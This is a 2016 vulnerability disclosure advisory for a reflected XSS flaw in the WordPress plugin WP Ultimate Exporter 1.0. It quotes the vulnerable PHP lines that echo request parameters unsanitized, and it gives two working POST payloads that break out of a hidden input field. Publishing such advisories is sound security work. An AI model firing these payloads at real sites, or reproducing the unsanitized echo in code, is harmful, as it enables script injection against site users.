WP Ultimate Exporter XSS Vulnerability

Rahul Pratap Singh <techno.rps@xxxxxxxxx> · Wed, 24 Feb 2016 19:37:26 +0530



        ## FULL DISCLOSURE
      
       
        #Product : WP Ultimate Exporter

          #Exploit Author : Rahul Pratap Singh

          #Version : 1.0

          #Home page Link : https://wordpress.org/plugins/wp-ultimate-exporter/

          #Website : 0x62626262.wordpress.com

          #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94

          #Date : 24/Feb/2016
        XSS Vulnerability:
        ----------------------------------------

          Description:

          ----------------------------------------

          "export_name" and "export_post_type_name" parameters are not
          sanitized that leads to Reflected XSS.
        ----------------------------------------

          Vulnerable Code:

          ----------------------------------------

          File Name: /wp-ultimate-exporter/includes/WUExporterUI.php
        Found at line:88

          $export_post_type = isset($_REQUEST['export_name']) ?
          $_REQUEST['export_name'] : '' ;

          
          Found at line:89

          $custom_post = isset($_REQUEST['export_post_type_name']) ?
          $_REQUEST['export_post_type_name'] : '' ;?>
         

        Found at line:91
        
          <input type ="hidden" value =
            '<?php echo $export_post_type?>'
            name='export_type_name'>

            
        Found at line:92
        
          <input type ="hidden" value =
            '<?php echo $custom_post?>'
            name='export_custompost_type'>

            
        ----------------------------------------

          Exploit:

          ----------------------------------------

          POST
          /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype
        export_name="/><input
          type=text _onclick_=alert(/XSS/)><!--"
        POST
          /wp-admin/admin.php?page=wp_ultimate_exporter&step=exportposttype
        export_post_type_name="/><input

          type=text _onclick_=alert(/XSS/)><!--"
        ----------------------------------------

          POC:

          ----------------------------------------

          https://0x62626262.files.wordpress.com/2016/02/wp-ultimate-exporter.png?w=1700

          https://0x62626262.files.wordpress.com/2016/02/wp-ultimate-exporter1.png?w=1700

        
        Vulnerability Disclosure Timeline:

          → January  30, 2016   – Bug discovered, initial report
          to WordPress

          → February 1,  2016   – WordPress response, plugin taken down

          → February 24, 2016  – Plugin up with same version

          
      [+] Disclaimer

        Permission is hereby granted for the redistribution of this
        advisory,

        provided that it is not altered except by reformatting it, and
        that due

        credit is given. Permission is explicitly given for insertion in

        vulnerability databases and similar, provided that due credit is
        given to

        the author.

        The author is not responsible for any misuse of the information
        contained

        herein and prohibits any malicious use of all security related
        information

        or exploits by the author or elsewhere.
    
  
Attachment:
0x9ACF7D5F.asc

Description: application/pgp-keys
Attachment:
signature.asc

Description: OpenPGP digital signature